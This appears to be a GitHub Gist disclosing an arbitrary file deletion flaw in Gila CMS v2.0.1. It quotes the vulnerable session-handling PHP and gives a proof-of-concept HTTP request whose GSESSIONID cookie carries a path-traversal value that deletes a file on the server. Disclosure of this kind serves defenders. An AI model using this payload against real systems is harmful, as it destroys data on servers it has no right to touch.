Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Gila CMS v2.0.1 Unrestricted File Deletion

Gila CMS (, v2.0.1 below is vulenrable to an arbitrary file deletion attack, where attacker can delete arbitrary files from the remote server by sending a malicious crafted GET request. In this version, a previous unrestricted file upload vulnerability ( is patched, but the webapp is still vulnerable.

Take Gila CMS v2.0.1 ( as example: The vulenrable component is at src/core/classes/Session.php:

if (isset($_COOKIE['GSESSIONID'])) {
        if (!file_exists(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID'])) {
          User::metaDelete(self::userId(), 'GSESSIONID', $_COOKIE['GSESSIONID']);

which calls:

public static function destroy()
    if (self::userId()>0) {
      $session_log = new Logger(LOG_PATH.'/sessions.log');
      $session_log->info('End', ['user_id'=>self::userId(), 'email'=>self::key('user_email')]);
    @$_SESSION = [];

The $_COOKIE['GSESSIONID'] variable is not properly filtered, which results in @unlink function delete any files as long as the webapp user has proper write access.

A sample request through Burp to delete /tmp/test.txt file:

GET /gila/?c=random_user HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../../../../../../tmp/test.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment